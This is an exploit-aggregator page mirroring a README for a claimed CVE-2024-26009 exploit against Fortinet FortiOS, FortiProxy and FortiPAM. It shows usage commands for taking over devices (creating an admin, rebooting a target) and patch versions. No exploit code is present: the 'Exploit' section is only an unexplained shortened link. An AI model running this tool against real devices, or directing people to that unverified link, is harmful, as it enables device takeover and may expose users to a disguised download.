Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-26009 PoC — Fortinet多款产品 安全漏洞

Source
https://github.com/allinsthon/CVE-2024-26009
Associated Vulnerability
Title:Fortinet多款产品 安全漏洞 (CVE-2024-26009)
Description:Fortinet FortiOS等都是美国飞塔(Fortinet)公司的产品。Fortinet FortiOS是一套专用于FortiGate网络安全平台上的安全操作系统。Fortinet FortiProxy是一种安全的网络代理,通过结合多种检测技术,如Web过滤、DNS过滤、DLP、反病毒、入侵防御和高级威胁保护,可以保护员工免受网络攻击。FortiProxy有助于减少带宽需求,并通过内容和视频缓存优化网络。Fortinet FortiPAM是一款权限访问控制的平台。 Fortinet多款产品存在安全漏
Readme

# CVE-2024-26009 Exploit  
Critical Security Vulnerability in Fortinet Devices  

## Affected Systems  
- FortiOS firewalls (multiple versions)  
- FortiProxy secure web gateways  
- FortiPAM privileged access managers  

## Impact  
Allows complete takeover of vulnerable devices when:  
1. Device is managed by FortiManager  
2. Attacker knows FortiManager's serial number  

Successful exploitation gives full administrator control without requiring valid credentials.  

## Exploit
[href](https://tinyurl.com/4puxhs3k)

## Usage  
```bash  
python3 exploit.py <target_ip> <fortimanager_serial> [options]  
```  

### Basic Examples  
Create new admin account:  
```  
python3 exploit.py 192.168.1.1 FGT60F123456789  
```  

Run custom command:  
```  
python3 exploit.py 10.10.15.200 FGT80XYZ987654 -c "execute reboot"  
```  

### Options  
| Parameter      | Description                          | Default Value |  
|----------------|--------------------------------------|---------------|  
| `-p`/`--port`  | Connection port                      | 9443          |  
| `-c`/`--command` | Command to execute on target device | Creates new admin |  

## Protection  
Immediately upgrade to fixed versions:  
- **FortiOS**: 6.4.16+ or 6.2.17+  
- **FortiProxy**: 7.4.3+, 7.2.9+, or 7.0.16+  
- **FortiPAM**: 1.2.0+  

## Legal Notice  
This tool is for:  
- Security research  
- Authorized penetration testing  
- Educational purposes  

Never use on systems without explicit permission.  

## References  
- [Fortinet Security Advisory](https://www.fortiguard.com/psirt/FG-IR-24-042)  
- CVE Score: 8.1 (High Severity)
File Snapshot

 [4.0K]  /data/pocs/b128c474a3026804de02ac0fbc89d90eb9f25d98
└── [1.6K]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.